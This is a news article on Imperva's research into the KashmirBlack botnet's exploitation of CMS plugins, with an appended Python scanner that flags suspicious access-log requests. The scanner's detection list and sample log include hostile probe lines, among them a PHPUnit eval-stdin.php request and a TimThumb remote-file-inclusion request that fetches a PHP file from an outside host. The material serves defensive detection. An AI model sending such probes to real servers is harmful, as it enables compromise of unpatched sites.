Date: 2020-10-23

Forgotten or unsecured CMS systems are now easy meat for botnet masters in a hurry. Photo: Getty

As criminals go, the people behind the vast and prolific KashmirBlack botnet must be an enterprising lot.

Not content with showering vulnerable content management systems (CMS) with plugin exploits, these guys have time for a little entrepreneurial action on the side selling campaign t-shirts at $7 a time (plus postage).

And intriguing apparel it is too, complete with overblown religious iconography that wouldn’t look out of place in a rock concert foyer. Not the banality of evil perhaps, but a reminder that bad people can be pretty cocky.

With their own Facebook page, it’s almost as if they don’t think they’ll be found, or that nobody will bother to look. On that score, it turns out they were wrong.

In research released this week, security company Imperva lays bare the innards of the KashmirBlack botnet, a factory of evil which over the last year has spewed 20 different plugin and CMS exploits and payloads at an estimated 70,000 servers per day.

Plugins for life

Estimating its size is guesswork, but Imperva reckons it might have reached 230,000 compromised servers, or about 700 new victims per day. On the receiving end are mostly US-based WordPress, Joomla, Drupal, and vBulletin CMS systems vulnerable to any one of a long list of software flaws.

These include, for starters, the jQuery File Upload arbitrary upload vulnerability (CVE-2018-9206), the elFinder command injection (CVE-2019-9194), the Magento (Magmi importer) local file inclusion (CVE-2015-2067), and the vBulletin widget RCE (CVE-2019-16759).

Many go back years and should long since have been patched, yet KashmirBlack clearly has had no trouble picking off low-hanging fruit. The weak patching is especially disappointing in the case of the WordPress TimThumb remote file inclusion (RFI) vulnerability (CVE-2011-4106), an infamous flaw in an image-resizing script bundled with countless themes and plugins and first disclosed in 2011.

“We suspect that the command & control has a scanner that searches for sites running CMS platforms, creates an attack instruction JSON with the new found sites, and pushes it into a queue waiting for bots to receive them and attack,” said Imperva.

The payloads either turn the server into a bot that spreads the infection further or plant backdoors that make the server hard to clean even once defenders know the infection is there. In September, the botnet started using Dropbox for its command and control (C&C):

“Moving to Dropbox allows the botnet to hide illegitimate criminal activity behind legitimate web services. It is yet another step towards camouflaging the botnet traffic, securing the C&C operation.”

The business model is primarily mining Monero cryptocurrency, which on an infected server means consuming up to 50% of its CPU time. This will hurt performance under load, although perhaps not enough for anyone to notice; a sustained, unexplained CPU load from the web server's PHP processes is nonetheless one of the few symptoms an admin can spot without inspecting the file system. There’s also a sideline in clickbait spamming.

Who’s behind it?

Tellingly, a third business model, website defacement, seems to have led Imperva to the hacker identity they believe is behind the entire botnet after that individual left a signature during one such attack.

There’s a connection to Indonesia, which serves to remind us that cybercrime has tentacles everywhere. Reading the US media, you might come away with the impression that cybercrime is filled with Russians, Chinese and Iranians when that’s always been a misleading simplification.

How do I know my CMS is affected?

That depends on the CMS and whether any vulnerable plugins are being used – Imperva has published a PDF list of affected software. If a site is infected, it’ll be a cleanup job for an experienced admin.

Importantly, the CMS core and its plugins should be updated, any plugins that aren’t in use removed (an installed but inactive plugin is still web-reachable code), and admin authentication protected with a strong password and a second factor.

Imperva also advises restricting access to certain files such as install.php, wp-config.php, and eval-stdin.php (the last is a PHPUnit helper that executes whatever PHP is sent in the request body and has no business being inside a web root; it ends up there when a Composer vendor directory is deployed wholesale). However, the best security advice is simply to look after a CMS more diligently rather than abandoning it.
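As an added example (this is not code from the article or from Imperva), here is a small Python scanner that runs over a web server's access log and flags the probes the advice above is aimed at: any request for the three files Imperva says to restrict, and any TimThumb request whose src parameter points at an external URL, which is the RFI pattern. It also reports, per source address, how many of those probes got a 200 back, since a 403 means the restriction is working and a 200 is what needs escalating. The Combined Log Format, the sample lines and the RFC 5737 addresses are all assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined Log Format as written by Apache and nginx by default (an assumption
# about the reader's log source; adjust the regex for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Files the article (citing Imperva) says should not be web-reachable.
SENSITIVE_FILES = {"install.php", "wp-config.php", "eval-stdin.php"}


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.groupdict()
    req["status"] = int(req["status"])
    return req


def probe_reason(target):
    """Return (reason, detail) if the request target looks like a CMS probe, else None."""
    parts = urlsplit(target)
    basename = unquote(parts.path).rsplit("/", 1)[-1].lower()
    if basename in SENSITIVE_FILES:
        return ("sensitive-file", basename)
    # TimThumb RFI: the vulnerable script fetched whatever URL was passed in src=.
    # A local path in src= is normal theme behaviour, so only external URLs count.
    if basename == "timthumb.php":
        for src in parse_qs(parts.query).get("src", []):
            if re.match(r"^(https?:)?//", src, re.IGNORECASE):
                return ("timthumb-rfi", src)
    return None


def scan(lines):
    """Return one hit dict per suspicious request, in log order."""
    hits = []
    for line in lines:
        req = parse_line(line)
        if req is None:
            continue
        verdict = probe_reason(req["target"])
        if verdict:
            hits.append({"ip": req["ip"], "status": req["status"],
                         "target": req["target"], "reason": verdict[0],
                         "detail": verdict[1]})
    return hits


def summarize(hits):
    """Per source IP: how many probes, and how many the server answered with 200.

    A 403 means the file restriction is doing its job; a 200 on eval-stdin.php
    or wp-config.php is the line to escalate.
    """
    summary = {}
    for h in hits:
        entry = summary.setdefault(h["ip"], {"probes": 0, "succeeded": 0})
        entry["probes"] += 1
        if h["status"] == 200:
            entry["succeeded"] += 1
    return summary


# Constructed sample log lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Oct/2020:03:14:07 +0000] "GET /wp-config.php HTTP/1.1" 403 199 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Oct/2020:03:14:09 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 54 "-" "python-requests/2.22"
198.51.100.23 - - [12/Oct/2020:03:20:41 +0000] "GET /wp-content/themes/foo/timthumb.php?src=http://203.0.113.99/x.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Oct/2020:03:20:44 +0000] "GET /wp-content/themes/foo/timthumb.php?src=%2Fwp-content%2Fuploads%2Flogo.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Oct/2020:03:25:00 +0000] "GET /index.php HTTP/1.1" 200 12345 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Oct/2020:03:25:02 +0000] "GET /wp-admin/install.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    found = scan(SAMPLE_LOG.splitlines())
    for h in found:
        print(f'{h["ip"]} {h["status"]} {h["reason"]} {h["detail"]}')
    print(summarize(found))
```

On the constructed sample this flags four requests: the wp-config.php and eval-stdin.php probes from 203.0.113.7 (the second answered with 200, so that host should be treated as possibly compromised), the external TimThumb src from 198.51.100.23, and the install.php request from 192.0.2.10. The TimThumb request with a local src is left alone, which is the point of checking the parameter rather than just the file name.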

The admin or owner might have forgotten about it but like an empty house in a good neighborhood, the botnet masters will be on to it in a shot.

The report doesn’t paint a pretty picture of a CMS world, too many bits of which are carelessly left to rot for years. This was never a good idea. These days, needlessly, it’s created a dangerous private playground for the bad guys to sow more chaos.

